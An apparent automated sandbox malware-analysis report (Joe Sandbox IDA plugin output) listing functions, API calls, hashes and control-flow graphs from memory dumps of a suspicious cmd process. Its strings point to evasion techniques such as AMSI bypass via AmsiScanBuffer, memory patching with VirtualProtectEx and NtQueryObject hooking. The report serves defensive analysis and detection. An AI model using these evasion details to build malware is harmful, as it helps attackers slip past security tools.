        • Instruction Fuzzy Hash: 6E51A464120A6EF9EB05DFE4EC49FC43360A7A0754F806713BC091A6A9DF7892FAD740

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: AddressLibraryLoadProcSleep
        • String ID: AmsiScanBuffer$amsi.dll
        • API String ID: 188063004-3248079830
        • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction ID: dae152e5fd4354b1bbc660f5c912285704649e613bd1fe81fdbfae5a37fe011f
        • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction Fuzzy Hash: EBD01210611968F9ED086B80F85CB1432217FB4F00FD06217EE0E093A0DE2C98F9AB00

        Control-flow Graph

        APIs
        • GetModuleFileNameW.KERNEL32 ref: 0000022123C53A35
        • PathFindFileNameW.SHLWAPI ref: 0000022123C53A44
          • Part of subcall function 0000022123C53F88: StrCmpNIW.SHLWAPI(?,?,?,0000022123C5272F), ref: 0000022123C53FA0
          • Part of subcall function 0000022123C53EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53EDB
          • Part of subcall function 0000022123C53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F0E
          • Part of subcall function 0000022123C53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F2E
          • Part of subcall function 0000022123C53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F47
          • Part of subcall function 0000022123C53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F68
        • CreateThread.KERNELBASE ref: 0000022123C53A8B
          • Part of subcall function 0000022123C51E74: GetCurrentThread.KERNEL32 ref: 0000022123C51E7F
          • Part of subcall function 0000022123C51E74: CreateThread.KERNELBASE ref: 0000022123C52043
          • Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C52049
          • Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C52055
          • Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C52061
          • Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C5206D
          • Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C52079
          • Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C52085
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
        • String ID:
        • API String ID: 2779030803-0
        • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
        • Instruction ID: 9afe7dbe84c22df07181eb58609c32dc443d26191db3144eb0e261d68297424e
        • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
        • Instruction Fuzzy Hash: 6C119E21610669F2FB6497E0B54EF9922A4A7B4345F50332BBD06AD2D4EF78C4F88600

        Control-flow Graph

        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: FileHandleType
        • String ID:
        • API String ID: 3000768030-0
        • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
        • Instruction ID: b40b4d39ec617a94c087d09c6644a6bfcc24f78ceb86c5855f7a4c3c416d6ba0
        • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
        • Instruction Fuzzy Hash: A231A422611B68E1E7688B54A5886692750F355BB0F64230BEF6A2B3F0CF35D4F1D340

        Control-flow Graph

        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: FileHandleType
        • String ID:
        • API String ID: 3000768030-0
        • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
        • Instruction ID: 3de1cc5741ad37d279f176a96636c9a890bfb73d9e13f69283e405435f72816b
        • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
        • Instruction Fuzzy Hash: 4B31A222610B6CE1EB608B5495886692750F365BB0F68230BEF6E1B3F0CB35D4F1C340
        APIs
        Memory Dump Source
        • Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
        • Instruction ID: 4fa13dde39c51f2829a8bf19444e7840ead8db3fef6e6b244b3441b202a92755
        • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
        • Instruction Fuzzy Hash: 8F913672B01260D7EB70AF65D408F6DB391FB64B94F549221BE4D0BB88DB3AD922C710
        APIs
        Memory Dump Source
        • Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
        • Instruction ID: 6b1e686705f46a1d720cf31a05dae39898c5bade451add285d356073603c9162
        • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
        • Instruction Fuzzy Hash: EF910472B01260DFDB74AF65D408F69B391FB64B98F948624EE4D4B788DB39D822C704

        Control-flow Graph

        APIs
          • Part of subcall function 0000022123C51724: GetProcessHeap.KERNEL32 ref: 0000022123C5172F
          • Part of subcall function 0000022123C51724: HeapAlloc.KERNEL32 ref: 0000022123C5173E
          • Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C517AE
          • Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C517DB
          • Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C517F5
          • Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C51815
          • Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C51830
          • Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C51850
          • Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C5186B
          • Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C5188B
          • Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C518A6
          • Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C518C6
        • SleepEx.KERNELBASE ref: 0000022123C51BDF
          • Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C518E1
          • Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C51901
          • Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C5191C
          • Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C5193C
          • Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C51957
          • Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C51977
          • Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C51992
          • Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C5199C
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: CloseOpen$Heap$AllocProcessSleep
        • String ID:
        • API String ID: 948135145-0
        • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
        • Instruction ID: 576c6261b53837ba7c8e002b3ddbd63acdeddd97c626ba3f03c39bae375af7a1
        • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
        • Instruction Fuzzy Hash: E2314855300529E1FF509BA6E54EB693394E764BC0F147613BE0A9F3D5DF21E4F28204

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 454 22123c52ff0-22123c53069 456 22123c53384-22123c533a7 454->456 457 22123c5306f-22123c53075 454->457 457->456 458 22123c5307b-22123c5307e 457->458 458->456 459 22123c53084-22123c53087 458->459 459->456 460 22123c5308d-22123c5309d GetModuleHandleA 459->460 461 22123c530b1 460->461 462 22123c5309f-22123c530af GetProcAddress 460->462 463 22123c530b4-22123c530d2 461->463 462->463 463->456 465 22123c530d8-22123c530f7 StrCmpNIW 463->465 465->456 466 22123c530fd-22123c53101 465->466 466->456 467 22123c53107-22123c53111 466->467 467->456 468 22123c53117-22123c5311e 467->468 468->456 469 22123c53124-22123c53137 468->469 470 22123c53147 469->470 471 22123c53139-22123c53145 469->471 472 22123c5314a-22123c5314e 470->472 471->472 473 22123c5315e 472->473 474 22123c53150-22123c5315c 472->474 475 22123c53161-22123c5316b 473->475 474->475 476 22123c53251-22123c53255 475->476 477 22123c53171-22123c53174 475->477 478 22123c53376-22123c5337e 476->478 479 22123c5325b-22123c5325e 476->479 480 22123c53186-22123c53190 477->480 481 22123c53176-22123c53183 call 22123c51a30 477->481 478->456 478->469 482 22123c53260-22123c5326c call 22123c51a30 479->482 483 22123c5326f-22123c53279 479->483 485 22123c53192-22123c5319f 480->485 486 22123c531c4-22123c531ce 480->486 481->480 482->483 490 22123c532a9-22123c532ac 483->490 491 22123c5327b-22123c53288 483->491 485->486 493 22123c531a1-22123c531ae 485->493 487 22123c531fe-22123c53201 486->487 488 22123c531d0-22123c531dd 486->488 496 22123c53203-22123c5320d call 22123c51cc4 487->496 497 22123c5320f-22123c5321c lstrlenW 487->497 488->487 494 22123c531df-22123c531ec 488->494 499 22123c532ae-22123c532b7 call 22123c51cc4 490->499 500 22123c532b9-22123c532c6 lstrlenW 490->500 491->490 498 22123c5328a-22123c53297 491->498 501 22123c531b1-22123c531b7 493->501 502 22123c531ef-22123c531f5 494->502 496->497 508 22123c53247-22123c5324c 496->508 505 22123c5321e-22123c5322d call 22123c51cfc 497->505 506 22123c5322f-22123c53241 call 22123c53f88 497->506 504 22123c5329a-22123c532a0 498->504 499->500 518 22123c532ee-22123c532f9 499->518 510 22123c532c8-22123c532d7 call 22123c51cfc 500->510 511 22123c532d9-22123c532e3 call 22123c53f88 500->511 501->508 509 22123c531bd-22123c531c2 501->509 502->508 514 22123c531f7-22123c531fc 502->514 517 22123c532a2-22123c532a7 504->517 504->518 505->506 505->508 506->508 512 22123c532e6-22123c532e8 506->512 508->512 509->486 509->501 510->511 510->518 511->512 512->478 512->518 514->487 514->502 517->490 517->504 524 22123c53370-22123c53374 518->524 525 22123c532fb-22123c532ff 518->525 524->478 528 22123c53307-22123c53321 call 22123c63a40 525->528 529 22123c53301-22123c53305 525->529 530 22123c53324-22123c53327 528->530 529->528 529->530 533 22123c5334a-22123c5334d 530->533 534 22123c53329-22123c53347 call 22123c63a40 530->534 533->524 535 22123c5334f-22123c5336d call 22123c63a40 533->535 534->533 535->524
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
        • API String ID: 2119608203-3850299575
        • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction ID: a18aa74cae5886aeceaa30cc55195881e5d3070e60fb2de0e7c0b7e17b368858
        • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction Fuzzy Hash: D5B1D632210AA8E6EB558FA5E808B59A3A4F764B84F046217FE096B7D5DF35CCF0C740

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 368 22123c22ff0-22123c23069 370 22123c23384-22123c233a7 368->370 371 22123c2306f-22123c23075 368->371 371->370 372 22123c2307b-22123c2307e 371->372 372->370 373 22123c23084-22123c23087 372->373 373->370 374 22123c2308d-22123c2309d GetModuleHandleA 373->374 375 22123c230b1 374->375 376 22123c2309f-22123c230af GetProcAddress 374->376 377 22123c230b4-22123c230d2 375->377 376->377 377->370 379 22123c230d8-22123c230f7 StrCmpNIW 377->379 379->370 380 22123c230fd-22123c23101 379->380 380->370 381 22123c23107-22123c23111 380->381 381->370 382 22123c23117-22123c2311e 381->382 382->370 383 22123c23124-22123c23137 382->383 384 22123c23147 383->384 385 22123c23139-22123c23145 383->385 386 22123c2314a-22123c2314e 384->386 385->386 387 22123c23150-22123c2315c 386->387 388 22123c2315e 386->388 389 22123c23161-22123c2316b 387->389 388->389 390 22123c23251-22123c23255 389->390 391 22123c23171-22123c23174 389->391 394 22123c23376-22123c2337e 390->394 395 22123c2325b-22123c2325e 390->395 392 22123c23186-22123c23190 391->392 393 22123c23176-22123c23183 call 22123c21a30 391->393 397 22123c231c4-22123c231ce 392->397 398 22123c23192-22123c2319f 392->398 393->392 394->370 394->383 399 22123c2326f-22123c23279 395->399 400 22123c23260-22123c2326c call 22123c21a30 395->400 405 22123c231d0-22123c231dd 397->405 406 22123c231fe-22123c23201 397->406 398->397 404 22123c231a1-22123c231ae 398->404 401 22123c2327b-22123c23288 399->401 402 22123c232a9-22123c232ac 399->402 400->399 401->402 411 22123c2328a-22123c23297 401->411 412 22123c232b9-22123c232c6 lstrlenW 402->412 413 22123c232ae-22123c232b7 call 22123c21cc4 402->413 414 22123c231b1-22123c231b7 404->414 405->406 415 22123c231df-22123c231ec 405->415 409 22123c23203-22123c2320d call 22123c21cc4 406->409 410 22123c2320f-22123c2321c lstrlenW 406->410 409->410 421 22123c23247-22123c2324c 409->421 418 22123c2322f-22123c23241 call 22123c23f88 410->418 419 22123c2321e-22123c2322d call 22123c21cfc 410->419 417 22123c2329a-22123c232a0 411->417 423 22123c232c8-22123c232d7 call 22123c21cfc 412->423 424 22123c232d9-22123c232e3 call 22123c23f88 412->424 413->412 428 22123c232ee-22123c232f9 413->428 414->421 422 22123c231bd-22123c231c2 414->422 425 22123c231ef-22123c231f5 415->425 427 22123c232a2-22123c232a7 417->427 417->428 418->421 432 22123c232e6-22123c232e8 418->432 419->418 419->421 421->432 422->397 422->414 423->424 423->428 424->432 425->421 435 22123c231f7-22123c231fc 425->435 427->402 427->417 437 22123c232fb-22123c232ff 428->437 438 22123c23370-22123c23374 428->438 432->394 432->428 435->406 435->425 442 22123c23301-22123c23305 437->442 443 22123c23307-22123c23321 call 22123c33a40 437->443 438->394 442->443 444 22123c23324-22123c23327 442->444 443->444 447 22123c23329-22123c23347 call 22123c33a40 444->447 448 22123c2334a-22123c2334d 444->448 447->448 448->438 450 22123c2334f-22123c2336d call 22123c33a40 448->450 450->438
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
        • API String ID: 2119608203-3850299575
        • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction ID: 232669d6e809adb8fb814049d847be6062c34bf6ba52a12da793003f0d465d9f
        • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction Fuzzy Hash: ADB19D622106A8E2EB648FA5D408FA9A3A4F764B94F046217FE0D5BB95DF35CDF1C340
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
        • String ID:
        • API String ID: 3140674995-0
        • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction ID: a95adb12e2d275a0b984cea36dbe99b456b81b2075c91b20b339c3c885174cd8
        • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction Fuzzy Hash: E5315872304B94DAEB608FA0E844BA97360F794704F44512AEB4E5BB98DF38C1A8CB10
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
        • String ID:
        • API String ID: 3140674995-0
        • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction ID: 73af25dfa3e8db10434555439d54d086f523961cd669686fbaef97be494a4e52
        • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction Fuzzy Hash: 3F317072204B94DAEB609FA0E854BED7360F794744F44512AEE4D4BB98DF38C6A8C710
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID: $rbx-
        • API String ID: 756756679-3661604363
        • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction ID: 308f741e1d9cba3fd2dab1443d122594ade13ae7b280522bee04cb7252c88487
        • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
        • Instruction Fuzzy Hash: 3431A521701B69E3EB95DF96D548B6973A4FB64B84F085222AF4C0BB55EF34C4F18700
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true
        • Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
        • String ID:
        • API String ID: 1239891234-0
        • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction ID: 1039c1b6ff24bfcd974d56b812665a69e0c4eb42814af022acc386f1ce192b4e
        • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction Fuzzy Hash: 68418B32214B94DAEB60CB64E84479E73A4F798764F501226EE8D4AB98DF38C1A5CB00
        APIs
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
        • String ID:
        • API String ID: 1239891234-0
        • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction ID: 21663d3c4c90719c54680f52ffc4336ccc1d03847aebfe372946bd96ea7e540a
        • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction Fuzzy Hash: A0417C32214B94D6EB60CF64E844B9E73A4F798754F501226EE8D4BB98DF38C2A5CB00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true
        • Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd
        Similarity
        • API ID: AddressLibraryLoadProcSleep
        • String ID: AmsiScanBuffer$amsi.dll
        • API String ID: 188063004-3248079830
        • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction ID: fa110740dc6d63eb47a52e77fcbc4bc1fcbae9fff45dec494ebf32867464c6bb
        • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction Fuzzy Hash: 32D06724611668F5EA096B91EC9CB983261BB74F01FC46617ED0E0A3A0DE2D8AF99340
        APIs
        Memory Dump Source
